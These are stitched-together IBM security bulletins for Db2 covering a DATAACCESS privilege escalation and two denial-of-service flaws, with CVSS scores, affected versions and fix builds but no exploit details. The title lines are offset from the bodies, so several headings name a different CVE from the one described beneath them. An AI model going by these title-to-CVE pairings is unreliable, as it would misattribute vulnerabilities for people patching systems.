\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSEPGG","label":"Db2 for Linux, UNIX and Windows"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF002","label":"AIX"},{"code":"PF033","label":"Windows"},{"code":"PF027","label":"Solaris"}\],"Version":"11.5, 11.1","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

CVE-2023-29258: IBM® Db2® is vulnerable to a denial of service through a specially crafted federated query on specific federation objects. (CVE-2023-29258)

IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 could allow a user with DATAACCESS privileges to execute routines that they should not have access to.  IBM X-Force ID:  260214.

  

**Summary**

IBM® Db2® could allow a user with DATAACCESS privileges to execute routines that they should not have access to.

**Vulnerability Details**

**CVEID:**   CVE-2023-38003  
**DESCRIPTION:**   IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) could allow a user with DATAACCESS privileges to execute routines that they should not have access to.  
CVSS Base score: 7.2  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/260214 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)

**Affected Products and Versions**

Affected Product(s)

Version(s)

Applicable Editions

IBM® Db2®

10.5.0.x

Server

IBM® Db2®

11.1.4.x

Server

IBM® Db2®

11.5.x

Server

All platforms are affected.  
Earlier releases (10.1, 9.7 etc.) may also be affected, but they are no longer supported. 

**Remediation/Fixes**

Customers running any vulnerable fixpack level of an affected Program, V10.5, v11.1 and V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for each impacted release: V10.5 FP11, V11.1.4 FP7, and V11.5.8. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.

**Release**

**Fixed in fix pack**

**APAR**

**Download URL**

V10.5

TBD

DT224740

Special Build for V10.5 FP11:

AIX 64-bit  
HP-UX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ big endian  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Solaris 64-bit, SPARC  
Solaris 64-bit, x86-64  
Windows 32-bit, x86  
Windows 64-bit, x86

V11.1

TBD

DT224740

Special Build for V11.1.4 FP7:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Solaris 64-bit, SPARC  
Windows 32-bit, x86  
Windows 64-bit, x86

V11.5

TBD

DT224740

Special Build for V11.5.0:

AIX 64-bit (for OS7.1)

Special Build for V11.5.8:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Windows 32-bit, x86  
Windows 64-bit, x86

  
V11.5.9:  
https://www.ibm.com/support/pages/node/7071342

IBM does not disclose key Db2 functionality nor replication steps for a vulnerability to avoid providing too much information to any potential malicious attacker. IBM does not want to enable a malicious attacker with sufficient knowledge to craft an exploit of the vulnerability.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

01 Dec 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSEPGG","label":"Db2 for Linux, UNIX and Windows"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF002","label":"AIX"},{"code":"PF033","label":"Windows"},{"code":"PF010","label":"HP-UX"},{"code":"PF027","label":"Solaris"}\],"Version":"11.5, 11.1, 10.5","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

CVE-2023-38003: IBM® Db2® is vulnerable to privilege escalation with DATAACCESS. (CVE-2023-38003)

IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to denial of service with a specially crafted query.  IBM X-Force ID:  266166.

  

**Summary**

IBM® Db2® is vulnerable to denial of service with a specially crafted query.

**Vulnerability Details**

**CVEID:**   CVE-2023-43020  
**DESCRIPTION:**   IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) is vulnerable to denial of service with a specially crafted query.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/266166 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

**Affected Products and Versions**

Affected Product(s)

Version(s)

Applicable Editions

IBM® Db2®

10.5.0.11

Server

IBM® Db2®

11.1.4.7

Server

IBM® Db2®

11.5.x

Server

All platforms are affected.  
Earlier releases (10.1, 9.7 etc.) may also be affected, but they are no longer supported. 

**Remediation/Fixes**

Customers running any vulnerable fixpack level of an affected Program,  V10.5, v11.1 and V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for each impacted release:  V10.5 FP11, V11.1.4 FP7, and V11.5.8. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.

**Release**

**Fixed in fix pack**

**APAR**

**Download URL**

V10.5

TBD

DT209233

Special Build for V10.5 FP11:

AIX 64-bit  
HP-UX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ big endian  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Solaris 64-bit, SPARC  
Solaris 64-bit, x86-64  
Windows 32-bit, x86  
Windows 64-bit, x86

V11.1

TBD

DT209233

Special Build for V11.1.4 FP7:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Solaris 64-bit, SPARC  
Windows 32-bit, x86  
Windows 64-bit, x86

V11.5

TBD

DT209233

Special Build for V11.5.0:

AIX 64-bit (for OS7.1)

  
Special Build for V11.5.8:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Windows 32-bit, x86  
Windows 64-bit, x86

  
V11.5.9:  
https://www.ibm.com/support/pages/node/7071342

IBM does not disclose key Db2 functionality nor replication steps for a vulnerability to avoid providing too much information to any potential malicious attacker. IBM does not want to enable a malicious attacker with sufficient knowledge to craft an exploit of the vulnerability.

**Workarounds and Mitigations**

None.

**References**

Off

**Acknowledgement**

**Change History**

01 Dec 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSEPGG","label":"Db2 for Linux, UNIX and Windows"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF002","label":"AIX"},{"code":"PF033","label":"Windows"},{"code":"PF010","label":"HP-UX"},{"code":"PF027","label":"Solaris"}\],"Version":"11.5, 11.1, 10.5","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

CVE-2023-47701: IBM® Db2® is vulnerable to denial of service with a specially crafted query. (CVE-2023-43020)

IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 federated server is vulnerable to a denial of service when a specially crafted cursor is used.  IBM X-Force ID:  269367.

  

**Summary**

IBM® Db2® federated server is vulnerable to a denial of service when a specially crafted cursor is used.

**Vulnerability Details**

**CVEID:**   CVE-2023-46167  
**DESCRIPTION:**   IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) federated server is vulnerable to a denial of service when a specially crafted cursor is used.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/269367 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)

**Affected Products and Versions**

Affected Product(s)

Version(s)

Applicable Editions

IBM® Db2®

11.5.6 through 11.5.8

Server

  
All platforms are affected.

**Remediation/Fixes**

Customers running any vulnerable fixpack level of an affected Program, V10.5, v11.1 and V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for each impacted release: V10.5 FP11, V11.1.4 FP7, and V11.5.9. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.

IBM does not disclose key Db2 functionality nor replication steps for a vulnerability to avoid providing too much information to any potential malicious attacker. IBM does not want to enable a malicious attacker with sufficient knowledge to craft an exploit of the vulnerability.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

01 Dec 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSEPGG","label":"Db2 for Linux, UNIX and Windows"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF002","label":"AIX"},{"code":"PF033","label":"Windows"}\],"Version":"11.5","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

Tag

#windows